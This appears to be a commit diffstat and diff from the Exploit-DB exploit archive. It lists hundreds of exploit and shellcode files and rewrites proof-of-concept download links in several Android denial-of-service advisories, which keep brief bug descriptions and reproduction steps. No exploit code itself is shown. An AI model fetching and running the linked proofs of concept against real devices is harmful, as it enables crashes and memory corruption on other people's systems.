exploits/windows/dos/38788.txt | 2 +- exploits/windows/dos/38789.txt | 2 +- exploits/windows/dos/38793.txt | 2 +- exploits/windows/dos/38794.txt | 2 +- exploits/windows/dos/38795.txt | 2 +- exploits/windows/dos/38796.txt | 2 +- exploits/windows/dos/38858.txt | 2 +- exploits/windows/dos/38934.txt | 2 +- exploits/windows/dos/39019.txt | 2 +- exploits/windows/dos/39020.txt | 2 +- exploits/windows/dos/39021.txt | 2 +- exploits/windows/dos/39022.txt | 2 +- exploits/windows/dos/39025.txt | 2 +- exploits/windows/dos/39040.txt | 2 +- exploits/windows/dos/39041.txt | 2 +- exploits/windows/dos/39042.txt | 2 +- exploits/windows/dos/39044.txt | 2 +- exploits/windows/dos/39045.txt | 2 +- exploits/windows/dos/39046.txt | 2 +- exploits/windows/dos/39047.txt | 2 +- exploits/windows/dos/39048.txt | 2 +- exploits/windows/dos/39049.txt | 2 +- exploits/windows/dos/39050.txt | 2 +- exploits/windows/dos/39051.txt | 2 +- exploits/windows/dos/39052.txt | 2 +- exploits/windows/dos/39053.txt | 2 +- exploits/windows/dos/39054.txt | 2 +- exploits/windows/dos/39055.txt | 2 +- exploits/windows/dos/39056.txt | 2 +- exploits/windows/dos/39220.txt | 2 +- exploits/windows/dos/39232.txt | 2 +- exploits/windows/dos/39233.txt | 2 +- exploits/windows/dos/39275.txt | 2 +- exploits/windows/dos/39330.txt | 2 +- exploits/windows/dos/39353.txt | 2 +- exploits/windows/dos/39393.txt | 2 +- exploits/windows/dos/39395.txt | 2 +- exploits/windows/dos/39396.txt | 2 +- exploits/windows/dos/39397.txt | 2 +- exploits/windows/dos/39398.txt | 2 +- exploits/windows/dos/39403.py | 2 +- exploits/windows/dos/39428.txt | 2 +- exploits/windows/dos/39429.txt | 2 +- exploits/windows/dos/39430.txt | 2 +- exploits/windows/dos/39431.txt | 2 +- exploits/windows/dos/39444.txt | 2 +- exploits/windows/dos/39509.txt | 2 +- exploits/windows/dos/39512.txt | 2 +- exploits/windows/dos/39518.txt | 2 +- exploits/windows/dos/39530.txt | 2 +- exploits/windows/dos/39533.txt | 2 +- exploits/windows/dos/39546.txt | 2 +- exploits/windows/dos/39560.txt | 2 +- exploits/windows/dos/39561.txt | 2 +- exploits/windows/dos/39600.txt | 2 +- exploits/windows/dos/39601.txt | 2 +- exploits/windows/dos/39602.txt | 2 +- exploits/windows/dos/39603.txt | 2 +- exploits/windows/dos/39605.txt | 2 +- exploits/windows/dos/39606.txt | 2 +- exploits/windows/dos/39608.txt | 2 +- exploits/windows/dos/39609.txt | 2 +- exploits/windows/dos/39610.txt | 2 +- exploits/windows/dos/39611.txt | 2 +- exploits/windows/dos/39612.txt | 2 +- exploits/windows/dos/39613.txt | 2 +- exploits/windows/dos/39647.txt | 2 +- exploits/windows/dos/39648.txt | 2 +- exploits/windows/dos/39743.txt | 2 +- exploits/windows/dos/39770.txt | 2 +- exploits/windows/dos/39778.txt | 2 +- exploits/windows/dos/39779.txt | 2 +- exploits/windows/dos/39819.txt | 2 +- exploits/windows/dos/39832.txt | 2 +- exploits/windows/dos/39833.txt | 2 +- exploits/windows/dos/39959.txt | 2 +- exploits/windows/dos/39960.txt | 2 +- exploits/windows/dos/39990.txt | 2 +- exploits/windows/dos/39991.txt | 2 +- exploits/windows/dos/40255.txt | 2 +- exploits/windows/dos/40256.txt | 2 +- exploits/windows/dos/40257.txt | 2 +- exploits/windows/dos/40398.txt | 2 +- exploits/windows/dos/40399.txt | 2 +- exploits/windows/dos/40406.txt | 2 +- exploits/windows/dos/40411.txt | 2 +- exploits/windows/dos/4044.txt | 2 +- exploits/windows/dos/40508.txt | 2 +- exploits/windows/dos/40509.txt | 2 +- exploits/windows/dos/40598.txt | 2 +- exploits/windows/dos/40599.txt | 2 +- exploits/windows/dos/40600.txt | 2 +- exploits/windows/dos/40601.txt | 2 +- exploits/windows/dos/40617.txt | 2 +- exploits/windows/dos/40656.txt | 2 +- exploits/windows/dos/40657.txt | 2 +- exploits/windows/dos/40658.txt | 2 +- exploits/windows/dos/40659.txt | 2 +- exploits/windows/dos/40661.txt | 2 +- exploits/windows/dos/40662.txt | 2 +- exploits/windows/dos/40663.txt | 2 +- exploits/windows/dos/40664.txt | 2 +- exploits/windows/dos/40665.txt | 2 +- exploits/windows/dos/40666.txt | 2 +- exploits/windows/dos/40667.txt | 2 +- exploits/windows/dos/40668.txt | 2 +- exploits/windows/dos/40744.txt | 2 +- exploits/windows/dos/40745.c | 2 +- exploits/windows/dos/40766.txt | 2 +- exploits/windows/dos/41025.txt | 2 +- exploits/windows/dos/4121.txt | 2 +- exploits/windows/dos/41222.py | 2 +- exploits/windows/dos/41363.txt | 2 +- exploits/windows/dos/41364.txt | 2 +- exploits/windows/dos/41365.txt | 2 +- exploits/windows/dos/41367.txt | 2 +- exploits/windows/dos/41417.txt | 2 +- exploits/windows/dos/41418.txt | 2 +- exploits/windows/dos/41419.txt | 2 +- exploits/windows/dos/41645.txt | 2 +- exploits/windows/dos/41646.txt | 2 +- exploits/windows/dos/41647.txt | 2 +- exploits/windows/dos/41648.txt | 2 +- exploits/windows/dos/41649.txt | 2 +- exploits/windows/dos/41650.txt | 2 +- exploits/windows/dos/41651.txt | 2 +- exploits/windows/dos/41652.txt | 2 +- exploits/windows/dos/41653.txt | 2 +- exploits/windows/dos/41654.txt | 2 +- exploits/windows/dos/41655.txt | 2 +- exploits/windows/dos/41656.txt | 2 +- exploits/windows/dos/41657.txt | 2 +- exploits/windows/dos/41658.txt | 2 +- exploits/windows/dos/41659.txt | 2 +- exploits/windows/dos/41661.html | 2 +- exploits/windows/dos/41756.txt | 2 +- exploits/windows/dos/41879.txt | 2 +- exploits/windows/dos/42009.txt | 2 +- exploits/windows/dos/42021.txt | 2 +- exploits/windows/dos/42081.txt | 2 +- exploits/windows/dos/42088.txt | 2 +- exploits/windows/dos/42092.txt | 2 +- exploits/windows/dos/42214.txt | 2 +- exploits/windows/dos/42230.txt | 2 +- exploits/windows/dos/42234.txt | 2 +- exploits/windows/dos/42235.txt | 2 +- exploits/windows/dos/42236.txt | 2 +- exploits/windows/dos/42237.txt | 2 +- exploits/windows/dos/42238.txt | 2 +- exploits/windows/dos/42239.txt | 2 +- exploits/windows/dos/42240.txt | 2 +- exploits/windows/dos/42241.txt | 2 +- exploits/windows/dos/42243.txt | 2 +- exploits/windows/dos/42264.txt | 2 +- exploits/windows/dos/42480.txt | 2 +- exploits/windows/dos/42744.txt | 2 +- exploits/windows/dos/42746.txt | 2 +- exploits/windows/dos/42758.txt | 2 +- exploits/windows/dos/42995.txt | 2 +- exploits/windows/dos/42997.txt | 2 +- exploits/windows/dos/4335.txt | 2 +- exploits/windows/dos/43373.txt | 2 +- exploits/windows/dos/43446.txt | 2 +- exploits/windows/dos/43515.txt | 2 +- exploits/windows/dos/43516.txt | 2 +- exploits/windows/dos/43517.txt | 2 +- exploits/windows/dos/4375.txt | 2 +- exploits/windows/dos/44096.txt | 2 +- exploits/windows/dos/44402.txt | 2 +- exploits/windows/dos/44466.txt | 2 +- exploits/windows/dos/44467.txt | 2 +- exploits/windows/dos/44914.txt | 2 +- exploits/windows/dos/44915.txt | 2 +- exploits/windows/dos/45435.txt | 2 +- exploits/windows/dos/45436.txt | 2 +- exploits/windows/dos/5327.txt | 2 +- exploits/windows/dos/5687.txt | 2 +- exploits/windows/dos/6330.txt | 2 +- exploits/windows/dos/6560.txt | 2 +- exploits/windows/dos/6565.txt | 2 +- exploits/windows/dos/6616.txt | 2 +- exploits/windows/dos/6658.txt | 2 +- exploits/windows/dos/6732.txt | 2 +- exploits/windows/dos/677.txt | 2 +- exploits/windows/dos/6824.txt | 2 +- exploits/windows/dos/7178.txt | 2 +- exploits/windows/dos/770.txt | 2 +- exploits/windows/dos/8090.txt | 2 +- exploits/windows/dos/8281.txt | 2 +- exploits/windows/dos/8306.txt | 2 +- exploits/windows/dos/8837.txt | 2 +- exploits/windows/dos/9167.txt | 2 +- exploits/windows/dos/9169.txt | 2 +- exploits/windows/dos/9170.txt | 2 +- exploits/windows/dos/9417.txt | 2 +- exploits/windows/local/11199.txt | 4 +- exploits/windows/local/11987.txt | 2 +- exploits/windows/local/14403.txt | 2 +- exploits/windows/local/14610.txt | 2 +- exploits/windows/local/14744.c | 2 +- exploits/windows/local/14745.c | 2 +- exploits/windows/local/14746.c | 2 +- exploits/windows/local/14747.c | 2 +- exploits/windows/local/14748.txt | 2 +- exploits/windows/local/14758.c | 2 +- exploits/windows/local/14764.c | 2 +- exploits/windows/local/14765.c | 2 +- exploits/windows/local/14769.c | 2 +- exploits/windows/local/14944.py | 2 +- exploits/windows/local/14966.py | 2 +- exploits/windows/local/14982.py | 2 +- exploits/windows/local/15094.py | 2 +- exploits/windows/local/15609.txt | 2 +- exploits/windows/local/15624.txt | 2 +- exploits/windows/local/15696.txt | 2 +- exploits/windows/local/15706.txt | 2 +- exploits/windows/local/16024.txt | 4 +- exploits/windows/local/17158.txt | 2 +- exploits/windows/local/17473.txt | 2 +- exploits/windows/local/17474.txt | 2 +- exploits/windows/local/17488.txt | 2 +- exploits/windows/local/18067.txt | 2 +- exploits/windows/local/18372.txt | 2 +- exploits/windows/local/19198.txt | 2 +- exploits/windows/local/19209.c | 2 +- exploits/windows/local/19359.txt | 2 +- exploits/windows/local/19401.txt | 4 +- exploits/windows/local/19425.txt | 2 +- exploits/windows/local/19502.txt | 4 +- exploits/windows/local/19594.txt | 2 +- exploits/windows/local/19633.txt | 2 +- exploits/windows/local/19733.txt | 2 +- exploits/windows/local/19739.txt | 2 +- exploits/windows/local/19789.txt | 2 +- exploits/windows/local/19839.txt | 2 +- exploits/windows/local/19855.txt | 2 +- exploits/windows/local/19894.txt | 2 +- exploits/windows/local/20012.txt | 4 +- exploits/windows/local/20022.txt | 2 +- exploits/windows/local/20257.txt | 2 +- exploits/windows/local/20265.txt | 2 +- exploits/windows/local/20383.txt | 2 +- exploits/windows/local/21072.txt | 2 +- exploits/windows/local/21096.txt | 2 +- exploits/windows/local/21344.txt | 2 +- exploits/windows/local/21690.txt | 2 +- exploits/windows/local/21691.txt | 2 +- exploits/windows/local/22193.txt | 2 +- exploits/windows/local/23096.txt | 2 +- exploits/windows/local/27282.txt | 2 +- exploits/windows/local/29125.txt | 2 +- exploits/windows/local/29374.txt | 2 +- exploits/windows/local/29465.txt | 2 +- exploits/windows/local/29603.txt | 2 +- exploits/windows/local/29695.txt | 2 +- exploits/windows/local/29881.txt | 2 +- exploits/windows/local/30007.txt | 2 +- exploits/windows/local/30192.txt | 2 +- exploits/windows/local/30680.txt | 2 +- exploits/windows/local/30681.txt | 2 +- exploits/windows/local/30999.txt | 2 +- exploits/windows/local/31090.txt | 2 +- exploits/windows/local/31667.txt | 2 +- exploits/windows/local/31895.txt | 2 +- exploits/windows/local/32572.txt | 4 +- exploits/windows/local/3260.txt | 2 +- exploits/windows/local/32771.txt | 2 +- exploits/windows/local/32850.txt | 2 +- exploits/windows/local/32891.txt | 2 +- exploits/windows/local/32892.txt | 2 +- exploits/windows/local/32893.txt | 2 +- exploits/windows/local/34648.txt | 2 +- exploits/windows/local/35019.py | 2 +- exploits/windows/local/35216.py | 2 +- exploits/windows/local/35661.txt | 2 +- exploits/windows/local/35901.txt | 4 +- exploits/windows/local/35902.txt | 4 +- exploits/windows/local/36424.txt | 2 +- exploits/windows/local/3664.txt | 2 +- exploits/windows/local/36859.txt | 2 +- exploits/windows/local/37049.txt | 6 +- exploits/windows/local/37657.txt | 2 +- exploits/windows/local/37768.txt | 2 +- exploits/windows/local/37925.txt | 2 +- exploits/windows/local/38198.txt | 2 +- exploits/windows/local/38199.txt | 2 +- exploits/windows/local/38200.txt | 2 +- exploits/windows/local/38201.txt | 2 +- exploits/windows/local/38202.txt | 2 +- exploits/windows/local/38287.txt | 2 +- exploits/windows/local/38289.txt | 2 +- exploits/windows/local/38474.txt | 2 +- exploits/windows/local/38792.txt | 2 +- exploits/windows/local/39310.txt | 2 +- exploits/windows/local/39311.txt | 2 +- exploits/windows/local/39666.txt | 2 +- exploits/windows/local/39694.txt | 2 +- exploits/windows/local/39788.txt | 2 +- exploits/windows/local/39804.txt | 2 +- exploits/windows/local/40040.txt | 2 +- exploits/windows/local/40118.txt | 2 +- exploits/windows/local/40224.txt | 2 +- exploits/windows/local/40426.txt | 2 +- exploits/windows/local/40655.txt | 2 +- exploits/windows/local/40660.txt | 2 +- exploits/windows/local/40823.txt | 2 +- exploits/windows/local/40848.java | 2 +- exploits/windows/local/41015.c | 2 +- exploits/windows/local/41031.txt | 2 +- exploits/windows/local/41144.txt | 2 +- exploits/windows/local/41207.txt | 2 +- exploits/windows/local/4178.txt | 2 +- exploits/windows/local/41902.txt | 2 +- exploits/windows/local/41933.txt | 2 +- exploits/windows/local/42077.txt | 2 +- exploits/windows/local/42325.py | 2 +- exploits/windows/local/42425.txt | 2 +- exploits/windows/local/42426.txt | 2 +- exploits/windows/local/42432.cpp | 2 +- exploits/windows/local/42537.txt | 2 +- exploits/windows/local/43057.txt | 2 +- exploits/windows/local/43162.txt | 2 +- exploits/windows/local/43366.md | 2 +- exploits/windows/local/43465.txt | 2 +- exploits/windows/local/43879.txt | 2 +- exploits/windows/local/44147.txt | 2 +- exploits/windows/local/44148.txt | 2 +- exploits/windows/local/44149.txt | 2 +- exploits/windows/local/44152.txt | 2 +- exploits/windows/local/44263.md | 2 +- exploits/windows/local/44267.md | 2 +- exploits/windows/local/44269.txt | 2 +- exploits/windows/local/44315.txt | 2 +- exploits/windows/local/44630.txt | 2 +- exploits/windows/local/44697.txt | 2 +- exploits/windows/local/44742.txt | 2 +- exploits/windows/local/44744.txt | 2 +- exploits/windows/local/44745.txt | 2 +- exploits/windows/local/44888.txt | 2 +- exploits/windows/local/44906.txt | 2 +- exploits/windows/local/45244.txt | 2 +- exploits/windows/local/45280.txt | 2 +- exploits/windows/local/4625.txt | 2 +- exploits/windows/local/5287.txt | 2 +- exploits/windows/local/5320.txt | 2 +- exploits/windows/local/5442.cpp | 2 +- exploits/windows/local/5518.txt | 2 +- exploits/windows/local/6705.txt | 2 +- exploits/windows/local/6757.txt | 2 +- exploits/windows/local/6994.txt | 2 +- exploits/windows/local/7054.txt | 2 +- exploits/windows/local/7516.txt | 2 +- exploits/windows/local/7533.txt | 2 +- exploits/windows/local/8175.txt | 2 +- exploits/windows/local/8250.txt | 2 +- exploits/windows/local/8280.txt | 2 +- exploits/windows/local/8322.txt | 2 +- exploits/windows/local/8595.txt | 2 +- exploits/windows/local/8782.txt | 2 +- exploits/windows/local/8875.txt | 2 +- exploits/windows/local/9301.txt | 2 +- exploits/windows/local/9579.txt | 2 +- exploits/windows/remote/11173.txt | 2 +- exploits/windows/remote/11661.txt | 2 +- exploits/windows/remote/12614.txt | 2 +- exploits/windows/remote/14179.txt | 2 +- exploits/windows/remote/14267.txt | 2 +- exploits/windows/remote/14275.txt | 2 +- exploits/windows/remote/14599.txt | 2 +- exploits/windows/remote/14674.txt | 2 +- exploits/windows/remote/14853.py | 2 +- exploits/windows/remote/14886.py | 2 +- exploits/windows/remote/14895.py | 2 +- exploits/windows/remote/15056.py | 2 +- exploits/windows/remote/15241.txt | 2 +- exploits/windows/remote/15296.txt | 2 +- exploits/windows/remote/15869.txt | 2 +- exploits/windows/remote/16594.rb | 2 +- exploits/windows/remote/17022.txt | 16 +-- exploits/windows/remote/17024.txt | 20 +-- exploits/windows/remote/17104.txt | 2 +- exploits/windows/remote/17105.txt | 2 +- exploits/windows/remote/17187.txt | 2 +- exploits/windows/remote/17419.zip | 4 +- exploits/windows/remote/17517.txt | 2 +- exploits/windows/remote/17575.txt | 2 +- exploits/windows/remote/17974.html | 4 +- exploits/windows/remote/17977.txt | 2 +- exploits/windows/remote/18016.txt | 2 +- exploits/windows/remote/18437.txt | 2 +- exploits/windows/remote/18531.html | 2 +- exploits/windows/remote/190.c | 6 +- exploits/windows/remote/19094.txt | 2 +- exploits/windows/remote/19245.pl | 2 +- exploits/windows/remote/19570.txt | 2 +- exploits/windows/remote/19580.txt | 2 +- exploits/windows/remote/19581.txt | 2 +- exploits/windows/remote/19611.txt | 2 +- exploits/windows/remote/19614.asm | 2 +- exploits/windows/remote/19617.txt | 2 +- exploits/windows/remote/19679.txt | 4 +- exploits/windows/remote/19688.txt | 4 +- exploits/windows/remote/19743.txt | 6 +- exploits/windows/remote/19895.txt | 2 +- exploits/windows/remote/20079.txt | 4 +- exploits/windows/remote/20106.cpp | 2 +- exploits/windows/remote/20184.txt | 2 +- exploits/windows/remote/20240.txt | 4 +- exploits/windows/remote/20283.txt | 2 +- exploits/windows/remote/20284.txt | 2 +- exploits/windows/remote/20427.txt | 2 +- exploits/windows/remote/2054.txt | 2 +- exploits/windows/remote/20547.txt | 2 +- exploits/windows/remote/20571.txt | 2 +- exploits/windows/remote/20758.c | 2 +- exploits/windows/remote/20774.txt | 2 +- exploits/windows/remote/20775.txt | 2 +- exploits/windows/remote/20818.txt | 2 +- exploits/windows/remote/20820.c | 4 +- exploits/windows/remote/20840.txt | 2 +- exploits/windows/remote/20841.txt | 2 +- exploits/windows/remote/20842.txt | 2 +- exploits/windows/remote/21169.txt | 2 +- exploits/windows/remote/21196.txt | 2 +- exploits/windows/remote/21199.txt | 2 +- exploits/windows/remote/21542.c | 2 +- exploits/windows/remote/21618.txt | 2 +- exploits/windows/remote/21631.txt | 2 +- exploits/windows/remote/21648.txt | 2 +- exploits/windows/remote/21692.txt | 2 +- exploits/windows/remote/21913.txt | 2 +- exploits/windows/remote/22022.txt | 2 +- exploits/windows/remote/22027.txt | 6 +- exploits/windows/remote/22028.txt | 2 +- exploits/windows/remote/22194.txt | 2 +- exploits/windows/remote/22288.txt | 4 +- exploits/windows/remote/22338.txt | 2 +- exploits/windows/remote/22341.txt | 2 +- exploits/windows/remote/22367.txt | 2 +- exploits/windows/remote/22368.txt | 2 +- exploits/windows/remote/22575.txt | 2 +- exploits/windows/remote/22726.txt | 2 +- exploits/windows/remote/22872.txt | 2 +- exploits/windows/remote/22917.txt | 2 +- exploits/windows/remote/22967.txt | 2 +- exploits/windows/remote/23034.txt | 2 +- exploits/windows/remote/23073.txt | 2 +- exploits/windows/remote/23079.txt | 2 +- exploits/windows/remote/23080.txt | 2 +- exploits/windows/remote/23083.txt | 2 +- exploits/windows/remote/23131.txt | 2 +- exploits/windows/remote/23198.txt | 2 +- exploits/windows/remote/23283.txt | 2 +- exploits/windows/remote/23340.txt | 4 +- exploits/windows/remote/23400.txt | 2 +- exploits/windows/remote/23401.txt | 2 +- exploits/windows/remote/23423.txt | 2 +- exploits/windows/remote/23489.txt | 2 +- exploits/windows/remote/23493.txt | 2 +- exploits/windows/remote/23758.txt | 2 +- exploits/windows/remote/24017.html | 2 +- exploits/windows/remote/24125.txt | 2 +- exploits/windows/remote/24653.txt | 2 +- exploits/windows/remote/24693.txt | 2 +- exploits/windows/remote/24767.txt | 2 +- exploits/windows/remote/25016.txt | 2 +- exploits/windows/remote/25020.txt | 2 +- exploits/windows/remote/25021.txt | 2 +- exploits/windows/remote/25022.txt | 2 +- exploits/windows/remote/25023.txt | 2 +- exploits/windows/remote/25025.txt | 2 +- exploits/windows/remote/25026.txt | 2 +- exploits/windows/remote/25027.txt | 2 +- exploits/windows/remote/25029.txt | 2 +- exploits/windows/remote/25033.txt | 2 +- exploits/windows/remote/25034.txt | 2 +- exploits/windows/remote/25049.txt | 2 +- exploits/windows/remote/25050.txt | 2 +- exploits/windows/remote/25057.txt | 2 +- exploits/windows/remote/25196.txt | 2 +- exploits/windows/remote/25386.txt | 2 +- exploits/windows/remote/25454.txt | 6 +- exploits/windows/remote/25989.txt | 2 +- exploits/windows/remote/27073.txt | 2 +- exploits/windows/remote/27526.txt | 2 +- exploits/windows/remote/27569.txt | 2 +- exploits/windows/remote/27611.txt | 2 +- exploits/windows/remote/27746.txt | 2 +- exploits/windows/remote/27754.txt | 2 +- exploits/windows/remote/27758.txt | 2 +- exploits/windows/remote/27759.txt | 2 +- exploits/windows/remote/27760.txt | 2 +- exploits/windows/remote/27943.txt | 2 +- exploits/windows/remote/28189.txt | 2 +- exploits/windows/remote/28331.txt | 2 +- exploits/windows/remote/29171.txt | 2 +- exploits/windows/remote/29524.txt | 2 +- exploits/windows/remote/29686.txt | 2 +- exploits/windows/remote/29688.txt | 2 +- exploits/windows/remote/30211.txt | 2 +- exploits/windows/remote/3022.txt | 2 +- exploits/windows/remote/30537.txt | 2 +- exploits/windows/remote/31032.txt | 2 +- exploits/windows/remote/31409.txt | 2 +- exploits/windows/remote/31583.txt | 2 +- exploits/windows/remote/32339.txt | 2 +- exploits/windows/remote/32699.txt | 2 +- exploits/windows/remote/3274.txt | 2 +- exploits/windows/remote/32851.html | 2 +- exploits/windows/remote/33024.txt | 2 +- exploits/windows/remote/33071.txt | 2 +- exploits/windows/remote/33172.txt | 4 +- exploits/windows/remote/33705.txt | 2 +- exploits/windows/remote/33712.txt | 2 +- exploits/windows/remote/33750.txt | 2 +- exploits/windows/remote/33964.txt | 2 +- exploits/windows/remote/33980.txt | 2 +- exploits/windows/remote/33981.txt | 2 +- exploits/windows/remote/34143.txt | 2 +- exploits/windows/remote/34174.txt | 2 +- exploits/windows/remote/34178.txt | 2 +- exploits/windows/remote/34437.txt | 2 +- exploits/windows/remote/34462.txt | 2 +- exploits/windows/remote/34647.txt | 2 +- exploits/windows/remote/35280.txt | 2 +- exploits/windows/remote/35434.txt | 2 +- exploits/windows/remote/35560.txt | 6 +- exploits/windows/remote/35573.txt | 2 +- exploits/windows/remote/35885.txt | 2 +- exploits/windows/remote/35886.txt | 2 +- exploits/windows/remote/3634.txt | 2 +- exploits/windows/remote/3635.txt | 2 +- exploits/windows/remote/3636.txt | 2 +- exploits/windows/remote/36491.txt | 2 +- exploits/windows/remote/3651.txt | 2 +- exploits/windows/remote/36542.txt | 2 +- exploits/windows/remote/36546.txt | 2 +- exploits/windows/remote/36829.txt | 2 +- exploits/windows/remote/3746.txt | 2 +- exploits/windows/remote/37840.txt | 2 +- exploits/windows/remote/37841.txt | 2 +- exploits/windows/remote/37842.txt | 2 +- exploits/windows/remote/3804.txt | 2 +- exploits/windows/remote/38384.txt | 2 +- exploits/windows/remote/38644.txt | 2 +- exploits/windows/remote/38742.txt | 2 +- exploits/windows/remote/38918.txt | 2 +- exploits/windows/remote/38968.txt | 2 +- exploits/windows/remote/39599.txt | 2 +- exploits/windows/remote/39805.txt | 2 +- exploits/windows/remote/40990.txt | 2 +- exploits/windows/remote/418.c | 2 +- exploits/windows/remote/4188.txt | 2 +- exploits/windows/remote/41894.py | 2 +- exploits/windows/remote/41903.txt | 2 +- exploits/windows/remote/41975.txt | 2 +- exploits/windows/remote/42711.txt | 2 +- exploits/windows/remote/43163.txt | 2 +- exploits/windows/remote/4334.txt | 2 +- exploits/windows/remote/44453.md | 2 +- exploits/windows/remote/44582.txt | 2 +- exploits/windows/remote/44987.txt | 2 +- exploits/windows/remote/4664.txt | 2 +- exploits/windows/remote/4699.txt | 2 +- exploits/windows/remote/4715.txt | 2 +- exploits/windows/remote/4760.txt | 2 +- exploits/windows/remote/4906.txt | 2 +- exploits/windows/remote/4948.txt | 2 +- exploits/windows/remote/4949.txt | 2 +- exploits/windows/remote/5213.txt | 2 +- exploits/windows/remote/6004.txt | 2 +- exploits/windows/remote/6367.txt | 2 +- exploits/windows/remote/6656.txt | 2 +- exploits/windows/remote/6841.txt | 2 +- exploits/windows/remote/7125.txt | 2 +- exploits/windows/remote/7132.py | 2 +- exploits/windows/remote/7403.txt | 2 +- exploits/windows/remote/8173.txt | 2 +- exploits/windows/remote/8704.txt | 2 +- exploits/windows/remote/8938.txt | 2 +- exploits/windows/remote/986.html | 4 +- exploits/windows/webapps/17388.txt | 2 +- exploits/windows/webapps/18077.txt | 2 +- exploits/windows/webapps/19525.txt | 2 +- exploits/windows/webapps/31221.txt | 2 +- exploits/windows/webapps/39573.txt | 2 +- exploits/windows/webapps/43883.txt | 2 +- exploits/windows_x86-64/dos/39043.txt | 2 +- exploits/windows_x86-64/dos/39072.txt | 2 +- exploits/windows_x86-64/dos/39221.txt | 2 +- exploits/windows_x86-64/dos/39712.txt | 2 +- exploits/windows_x86-64/dos/40196.txt | 2 +- exploits/windows_x86-64/local/20861.txt | 2 +- exploits/windows_x86-64/local/39035.txt | 2 +- exploits/windows_x86-64/local/39520.txt | 2 +- exploits/windows_x86-64/local/41020.c | 2 +- exploits/windows_x86-64/local/41605.txt | 2 +- exploits/windows_x86-64/local/41908.txt | 2 +- exploits/windows_x86-64/local/42435.txt | 2 +- exploits/windows_x86-64/local/42960.txt | 2 +- exploits/windows_x86-64/local/44313.txt | 2 +- exploits/windows_x86/dos/15214.py | 2 +- exploits/windows_x86/dos/37881.txt | 2 +- exploits/windows_x86/dos/38265.txt | 2 +- exploits/windows_x86/dos/38266.txt | 2 +- exploits/windows_x86/dos/38267.txt | 2 +- exploits/windows_x86/dos/38268.txt | 2 +- exploits/windows_x86/dos/38269.txt | 2 +- exploits/windows_x86/dos/38270.txt | 2 +- exploits/windows_x86/dos/38271.txt | 2 +- exploits/windows_x86/dos/38273.txt | 2 +- exploits/windows_x86/dos/38274.txt | 2 +- exploits/windows_x86/dos/38275.txt | 2 +- exploits/windows_x86/dos/38276.txt | 2 +- exploits/windows_x86/dos/38277.txt | 2 +- exploits/windows_x86/dos/38278.txt | 2 +- exploits/windows_x86/dos/38279.txt | 2 +- exploits/windows_x86/dos/38280.txt | 2 +- exploits/windows_x86/dos/38307.txt | 2 +- exploits/windows_x86/dos/39026.txt | 2 +- exploits/windows_x86/dos/39027.txt | 2 +- exploits/windows_x86/dos/39993.txt | 2 +- exploits/windows_x86/dos/45453.py | 25 ++++ exploits/windows_x86/dos/45455.py | 29 +++++ exploits/windows_x86/dos/45457.py | 27 +++++ exploits/windows_x86/local/38403.txt | 2 +- exploits/windows_x86/local/39432.c | 2 +- exploits/windows_x86/local/40039.cpp | 2 +- exploits/windows_x86/local/8799.txt | 2 +- exploits/windows_x86/remote/11615.txt | 2 +- files_exploits.csv | 40 ++++-- files_shellcodes.csv | 2 + shellcodes/arm/45458.c | 154 ++++++++++++++++++++++++ shellcodes/arm/45459.c | 130 ++++++++++++++++++++ shellcodes/linux_x86/13366.txt | 2 +- shellcodes/osx/17564.asm | 2 +- shellcodes/windows_x86/13507.txt | 4 +- shellcodes/windows_x86/15879.txt | 2 +- shellcodes/windows_x86/39754.txt | 2 +- 1981 files changed, 2817 insertions(+), 2133 deletions(-) create mode 100644 exploits/hardware/webapps/45446.txt create mode 100755 exploits/hardware/webapps/45448.py create mode 100644 exploits/hardware/webapps/45454.txt create mode 100644 exploits/hardware/webapps/45460.txt create mode 100644 exploits/linux/dos/45450.txt create mode 100644 exploits/php/webapps/45445.txt create mode 100644 exploits/php/webapps/45447.txt create mode 100644 exploits/php/webapps/45449.txt create mode 100755 exploits/php/webapps/45451.pl create mode 100644 exploits/php/webapps/45452.txt create mode 100644 exploits/php/webapps/45456.txt create mode 100755 exploits/windows_x86/dos/45453.py create mode 100755 exploits/windows_x86/dos/45455.py create mode 100755 exploits/windows_x86/dos/45457.py create mode 100644 shellcodes/arm/45458.c create mode 100644 shellcodes/arm/45459.c diff --git a/exploits/android/dos/38555.txt b/exploits/android/dos/38555.txt index de2818e3c..71bf4d362 100644 --- a/exploits/android/dos/38555.txt +++ b/exploits/android/dos/38555.txt @@ -35,4 +35,4 @@ In this code snippet, the data.buf_out.num_planes value is attacker-controlled " Proof-of-concept code to trigger this issue (from a privileged shell) is attached (m2m1shot_compat.c). Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38555.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38555.zip \ No newline at end of file diff --git a/exploits/android/dos/38557.txt b/exploits/android/dos/38557.txt index d818588a5..b8cf1de04 100644 --- a/exploits/android/dos/38557.txt +++ b/exploits/android/dos/38557.txt @@ -56,4 +56,4 @@ One ioctl should have valid data, the other should fail At this point ctx->mm will now have invalid or free data (free if the forked process dies). Proof-of-concept code to trigger this condition is attached (fimg2d-lock.c) Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38557.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38557.zip \ No newline at end of file diff --git a/exploits/android/dos/38610.txt b/exploits/android/dos/38610.txt index 03c703a84..ab9e80169 100644 --- a/exploits/android/dos/38610.txt +++ b/exploits/android/dos/38610.txt @@ -26,4 +26,4 @@ I/DEBUG ( 2958): #03 pc 000000000042ec00 /system/priv-app/SecGallery2015/ To reproduce, download the file and open it in Gallery Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38610.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38610.zip \ No newline at end of file diff --git a/exploits/android/dos/38611.txt b/exploits/android/dos/38611.txt index 154dd6afe..ac28c6d1c 100644 --- a/exploits/android/dos/38611.txt +++ b/exploits/android/dos/38611.txt @@ -31,4 +31,4 @@ To reproduce, download the attached file and wait, or trigger media scanning by adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/shell/emulated/0/ Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38611.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38611.zip \ No newline at end of file diff --git a/exploits/android/dos/38612.txt b/exploits/android/dos/38612.txt index 2c09c5f2a..b51ab8496 100644 --- a/exploits/android/dos/38612.txt 